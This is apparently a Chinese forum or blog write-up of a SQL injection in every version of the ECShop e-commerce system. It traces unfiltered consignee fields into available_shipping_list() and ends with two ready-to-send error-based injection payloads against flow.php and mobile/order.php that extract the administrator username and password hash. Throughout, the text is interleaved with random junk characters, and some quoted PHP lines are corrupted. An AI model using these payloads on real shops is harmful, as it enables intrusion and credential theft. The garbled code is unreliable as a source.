ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。
5 X9 R' ?) o# e) M
5 b8 c( k& X& s* _7 h8 ~    漏洞关键文件：

    /includes/lib_order.php

    关键函数：



8 \8 x) k' |4 f01     function available_shipping_list($region_id_list)
! x( r* w: s+ U- q, ]8 r6 ?
$ U, q5 x- R/ `- b* E02 {
9 B( k  A) s$ x4 ~9 r* K
03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .

" e3 e+ I$ u- b3 x6 N% r* {% V04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .
. S5 _  N* E9 P7 n. W: i) g$ q6 Y/ |0 ?
+ Y8 `  w$ d8 m  r5 p05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
# ^: \9 L! b( o7 T  ~, b, t
  I  G0 X- p( G# P+ ]( U6 J08             'WHERE r.region_id ' . db_create_in($region_id_list) .
7 i, M9 k" Z0 m# O% Q
& q6 j% f9 G1 v/ k+ a; v% t09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

10   

. ?4 e1 J. \; N4 H. P9 w11     return $GLOBALS['db']->getAll($sql);
6 z3 C8 y" X/ l( s
/ @7 O. g' X! y: Y. d9 S12 }

显然对传入的参数没有任何过滤就带入了查询语句。
; }. N( r3 E, c: R- h5 ?0 {4 L
4 _1 [8 B' M. P3 S& z# y+ V下面我们追踪这个函数在flow.php中：
第531行：   
4 b. J- T, ~. A8 w5 w* v
1 $shipping_list     = available_shipping_list($region);
4 U" i7 N5 H) x' F$ m/ w



4 u1 I" f" F& d
再对传入变量进行追踪：
2 u/ Q# s+ T3 g7 p! n7 A
第530行：   
/ Y6 z% ^0 F! Q8 N9 u. S$ ~: G* H8 F
4 R# U; c" E, W- U1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
3 R/ r, c! @$ I5 g; [) c4 T3 x6 r


7 V) d- e( N. q. }# t* Z2 Y
  ~+ t9 J$ [# }7 B
第473行：        
! X: A( x2 A2 c- x8 O% I
* n' o# m& t) I# q1 $consignee = get_consignee($_SESSION['user_id']);
4 I$ [6 s+ I: V3 v. h1 [4 `
- D- [, A5 m+ [5 n, P! r% H! L- }到了一个关键函数：

/includes/lib_order.php


) s2 M4 I  R7 ]4 L$ \3 ?& Q9 A% M
  A5 y) k- o9 I6 f$ R1 }
: V2 P$ o9 L" p( l8 N! E1 l
; P) y9 ?" E9 k3 L01 function get_consignee($user_id)
" Y- W+ O8 q4 I7 v. K+ p, ]* L3 W
5 {1 ?6 Y, j! q% T02 {

03     if (isset($_SESSION['flow_consignee']))
# m. U5 b% L- c
04     {
7 d; }2 L; _' b( x( a! h" w
05         /* 如果存在session，则直接返回session中的收货人信息 */
: @: H% q& ]! P2 y- A4 P
06   

07         return $_SESSION['flow_consignee'];

1 F. ?/ Q! s2 ~; n! @- \3 |08     }

2 b  N* ?) p7 ~09     else
4 s  `! ]* }9 V2 L$ _6 Z4 j
8 o. `' w6 S( d/ _, i10     {

11         /* 如果不存在，则取得用户的默认收货人信息 */
: D& K3 n+ A5 a& i7 Y
) l% V6 P* S* R* `* b12         $arr = array();
; r  Y6 Z. G, h
4 i5 ?( v9 m# ~2 _13   

0 W2 t' y" @$ p- r14         if ($user_id > 0)
8 x( ~0 Y9 t! [! x+ d4 i7 T
0 f$ m- S0 d' ^' i) |15         {
' s  G% o* m' T% t
, B) y# l# R3 r# u9 R5 B3 S16             /* 取默认地址 */

17             $sql = "SELECT ua.*".

, _# c  X" ^4 J$ z. c% G! {18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
# u. q$ e  h0 `6 h7 l  ~: E
19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";

20   
0 T& l3 g0 D& z! s# R5 i
, b" ~. O" C6 U/ k4 F$ r21             $arr = $GLOBALS['db']->getRow($sql);

$ e, ]2 u$ e6 v7 F# Q22         }

$ o/ K+ ?% f% t# o4 p: H$ T23   

* W  Y2 Z" b- Y5 R! c$ R. X# z24         return $arr;

3 I/ g$ B% d" @0 i  h/ M4 g+ ]/ n" ?25     }

1 z0 U! h5 E' S: c26 }

" F" D* B$ U* s7 l# A4 s; B显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？
9 W: d% h7 n# Z3 v5 H8 @" N% R2 h6 D
1 ?/ z; O5 K( S# g) `8 Q" f

8 j- I- j9 |0 l' h; \关键点:

  M3 b5 `: u6 p  G2 N' c6 q1 I第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

# V/ f- Z2 i! _0 I这里对传入参数反转义存入$_SESSION中。
/ q. Q7 h( G5 W6 G2 |: b3 U7 _

6 i! X5 F& ]  E- I5 |
然后看下：
) n9 g: [) [2 V
" A2 l2 a- I! X0 r& X

   

5 S$ f7 U( U' X* e01 $consignee = array(

02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),

03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),
& l) \$ g1 `( M5 s; L3 f# k
04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
- b8 j% }- I8 p  x' v
05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

06         'city'          => empty($_POST['city'])       ? '' _POST['city'],

/ A/ G2 j) Z- p9 N& E, U07         'district'      => empty($_POST['district'])   ? '' _POST['district'],

; K4 S1 h# }' M+ R9 U08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

  _7 h$ d) d- Z3 u* S2 t09         'address'       => empty($_POST['address'])    ? '' _POST['address'],

0 C6 g3 x4 n' d  w+ e1 z10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
3 b/ E& S4 \( o+ j  }
0 _) X7 [# i1 p! a/ ?12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),
* m! u" V) G! t; R" o" l: B
13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],
* y4 H3 O. m$ o
8 ^" p, l: u$ S+ ?2 \5 A8 C15     );
6 L! @  j1 @5 E) W* ]
9 {; S+ i" y* k好了注入就这样出现了。
1 ]  @0 C- o3 D
0 |: B. ]( n* c. P1 H/ a==================
9 P; Q# O9 Q: f1 l; F6 }6 T
注入测试：
, G8 ]$ Q3 u& }* }9 {0 R
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
& V7 |4 `/ q% C! g! _; M
测试程序：ECShop_V2.7.3_UTF8_release1106
' l/ l0 d3 A. v( q0 g, y

/ D& B2 i% B0 {4 R+ G) ^. Q
1.首先需要点击一个商品加入购物车

- M" H/ {' N/ f- _& I2.注册一个会员帐号

4 |2 w" Y, A1 m( D. Y! ^3.post提交数据
6 R2 O  `) Q6 c. G: x* [7 _7 o


5 Z/ }. a- U* C% x1 http://127.0.0.1/ecshop/flow.php

) K% l3 {  V6 `( K2   

1 D& w/ y) ~) X- A3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
1 W8 R6 ?, U! ?9 [5 P" A举一反三，我们根据这个漏洞我们可以继续深入挖掘：

; T# s/ x5 O& @2 ^6 N我们搜寻关键函数function available_shipping_list()
& X2 ^5 E/ V1 L8 u" ^
0 a0 j+ ?' g7 q. Z! T在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

利用exp:

' o& k( s" Y! L+ |1 v- g1.点击一个商品，点击购买商标
  T- {6 Z! @% I; p3 }
' [9 r( J/ j; @/ Q3 P2.登录会员帐号
; n1 @7 P9 C* e, I$ d9 S
3.post提交：

$ j4 d$ N  G0 T2 v; L1 c, X# Jhttp://127.0.0.1/ecshop/mobile/order.php
7 m$ l! K7 C# c: y- h" r6 J0 d4 p

! u) J& n  K* Q" N, l
country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=